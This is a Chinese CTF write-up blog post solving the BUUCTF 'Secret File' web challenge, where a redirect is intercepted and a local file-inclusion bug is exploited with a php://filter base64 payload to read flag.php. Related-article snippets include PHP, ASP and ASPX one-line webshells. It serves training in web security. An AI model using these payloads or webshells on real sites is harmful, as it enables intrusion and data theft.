2021-06-19

最新推荐文章于 2021-12-12 02:07:07 发布
最新推荐文章于 2021-12-12 02:07:07 发布
阅读量98 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZZZllllllxx/article/details/118055469
版权
本文详细描述了一次极客大挑战中解决安全问题的过程。通过php伪协议和302重定向,作者发现了secr3t.php文件,并尝试访问flag.php。由于过滤机制,直接访问flag.php无效,于是构造了php伪协议payload成功解码获取了隐藏信息。
摘要由CSDN通过智能技术生成

2021/6/19
[极客大挑战 2019]Secret File
php伪协议
302转跳
打开之后页面没啥有用的信息去看源码
在这里插入图片描述
发现了Archive_room.php访问有一个
SECRET 点击发现是直接就转跳了想到bp抓包
于是抓包
在这里插入图片描述
发现 secr3t.php
去访问发现一段源码

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

一开始考虑直接访问flag.php,但是发现查看不了flag
又看上边过滤了很多,于是又想到了php伪协议
构造payload:http://1ad1ad22-079c-4897-8eb9-2ebfe14abc2b.node3.buuoj.cn/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
果然

在这里插入图片描述
解码
在这里插入图片描述

HaHazzzlll
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF刷题系列
qq_45655564的博客
07-11 496
[HCTF 2018]WarmUp 查看网页源代码,得到source.php 可以得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
app-privacy-report-2021-06-16-15-19.json
08-16
app-privacy-report-2021-06-16-15-19.json
BUUCTF-Secret File
z1moq的博客
09-06 467
Secret 意为秘密,可知我们需要在网页中寻找到隐藏的flag文件 启动环境打开靶机 直接查看源码,发现一个文件 打开后点击 secret 但是会直接跳转到 end.php 并且提示查阅结束,说明页面跳转过快,需要手动抓放包来查看 经过拦截显示出隐藏 php 文件,访问后出现源码 <html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file
【BUUCTF】[极客大挑战 2019] Secret File Writeup
algae
08-22 711
<html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stris...
WEB 渗透题(一)
0xac001d09
12-06 3833
[ACTF2020 新生赛]Include --文件包含 思路 burp 抓包,发现文件名有点问题。题目和网址的 file 参数,提示这是文件包含的题。 GET /?file=flag.php HTTP/1.1 Host: 9b09eb46-2433-4403-b582-c5ee23d12378.node4.buuoj.cn:81 因此可以构造文件名发包 file=php://filter/read=convert.base64-encode/resource=flag.php GET /?file=ph
BUUCTF刷题[Secret File]&[LoveSQL]&[Ping Ping Ping]
Pysnow's Blog
12-12 204
[极客大挑战 2019]Secret File [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping
2021-01-06
qq_40504996的博客
01-06 878
运行机某个js文件访问不了。做了过滤器,没有被过滤的。其他js文件都可以。就单独一个403。考虑是否是防火墙做了一些敏感词的判断过滤。 将js文件名修改试一下,或者从防火墙那方面做文章 ...
Screenshot_2021-12-13-19-12-28-441_com.sm.tiktoktool.jpg
12-14
Screenshot_2021-12-13-19-12-28-441_com.sm.tiktoktool.jpg
Pipeline-Trigger-2021-04-06T19-27-21.114Z:为工具链创建
04-13
标题中的“Pipeline-Trigger-2021-04-06T19-27-21.114Z:为工具链创建”暗示了这是一个关于自动化工作流程的项目,具体是针对构建和触发工具链的设置。在IT行业中,Pipeline通常指的是CI/CD(持续集成/持续部署)流程...
WebIDE-UISimpleTC-2021-04-06T06-19-20.427Z-github:为工具链创建
04-06
【标题】"WebIDE-UISimpleTC-2021-04-06T06-19-20.427Z-github:为工具链创建"揭示了一个项目,它涉及到Web集成开发环境(IDE)的用户界面(UI)简单测试用例的创建,且与GitHub有关。这个项目可能是一个开源项目,...
2021-2022收藏的精品资料2021-2022年APQP全套表单——新产品质量策划进度计划APQP.doc
09-16
2. **确定新产品项目开发任务**:开发部根据分析结果制定设计开发任务书(TR-0701-05),并组建APQP小组,确定参与人员(TR-0701-06)。 3. **编制新产品项目APQP开发计划**:开发部负责制定详细的新产品项目APQP...
mysql源码安装
热门推荐
zengzehui的专栏
10-03 68万+
1、安装依赖            在安装mysql之前需要安装的依赖有make、bison、gcc-c++、cmake、ncurses            以上下载地址如下:             make编译器下载地址:http://www.gnu.org/software/make/             bison下载地址:http://www.gnu.org/softwar
mysql数据库反弹端口连接提权
xiaotu0821的博客
11-12 6万+
Mysql数据库反弹端口连接提权 在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令,在一般的情况下,也就放弃了,但其实可以换一种思路,通过mysql查询来直接提权,可以针对以下场景: (1)通过网站无法获取webshell (2)Webshell无法执行命令 (3)有phpmyadmin和root账号,无法查询或者无...
[极客大挑战 2019]Secret File
怪味巧克力的博客
07-11 584
0x01 进入页面如下 看不到什么东西,所以查看源码 源码中发现有一个链接到另一个页面,原页面为黑色看不到链接,所以我们转到链接给的页面 有一个按钮,点击看看 发现点击之后直接跳到了end.php页面,查看源码也没有什么有用的东西,应该是时间过短然后就跳转,所以我们用抓包截断一下,发现结果如下 验证了我的想法,存在这个页面,直接进去看看 0x02 <html> <title>secret</title> <meta charset="UT
2021-10-17
ZZZllllllxx的博客
10-17 1320
陇剑杯wp 记得住的一些题目 1. 打开之后发现基本都是404 寻找200的发现www.zip 2. 这题当时先注意到题目为jwt,去网上搜索发现他就是一种认证方式,所以答案就是jwt 插一段知识点 Token的定义:Token是服务端生成的一串字符串,以作客户端进行请求的一个令牌,当第一次登录后,服务器生成一个Token便将此Token返回给客户端,以后客户端只需带上这个Token前来请求数据即可,无需再次带上用户名和密码。 使用Token的目的:Token的目的是为了减轻服务器的压力,减少频繁的查询
2021-09-15
ZZZllllllxx的博客
09-22 1226
[RoarCTF 2019]Easy Calc 1 打开之后先看了眼源码 发现一句注释 还有calc.php 去查了一下WAF 英文:Web Application Firewall,简称: WAF 通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品 与传统防火墙不同,WAF工作在应用层 WAF对来自Web应用程序客户端的各类请求进行内容检测和验证,确保其安全性与合法性,对非法的请求予以实时阻断,从而对各类网站站点进行有效防护。 然后访问calc.php发现了源码 &lt
2021-06-15
ZZZllllllxx的博客
06-19 1009
2021/6/15 bugku web30 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!</p>"; } } ?> 这题也有关php伪协议看到了file_get_contents这
2021-09-14
ZZZllllllxx的博客
09-15 567
[极客大挑战 2019]Upload 常见upload检查内容有,后缀名、content-type、文件头的部分内容 经常用到的一句话木马有 php: <?php @eval($_POST['21']);?> asp: <%eval request (“21”)%> aspx: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“21”],“unsafe”);%> 试图直接上传php一句话木马,但是并未
2021-06-06
ZZZllllllxx的博客
06-06 273
bugku 2021/6/6 web26 解题 用hackbar的referrer直接加http://www.google.com/ HTTP 请求报文由3部分组成(请求行+请求头+请求体) 请求行=请求方法+请求URL+HTTP协议及版本 请求方法:GET和POST是最常见的HTTP方法,除此以外还包括 DELETE、HEAD、OPTIONS、PUT、TRACE 请求URL地址:他和报文头的Host属性,组合起来是一个完整的请求URL 本题考查的主要为请求报文头的属性 常见的HTTP 报文头属性 Accp
{"data":"{\"hesitateDate\":\"2021-06-19\"}","msg":"查询成功","success":false}怎么取到data里的数据
最新发布
11-24
可以使用json.loads()方法将字符串转换为json对象,然后通过键"data"获取其中的数据。具体代码如下所示: ```python import json # 假设引用内容为quote quote = {"data":"{\"hesitateDate\":\"2021-06-19\"}","msg":"查询成功","success":false} # 将字符串转换为json对象 json_obj = json.loads(quote["data"]) # 获取json对象中的数据 hesitate_date = json_obj["hesitateDate"] # 输出数据 print(hesitate_date) # 输出:2021-06-19 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值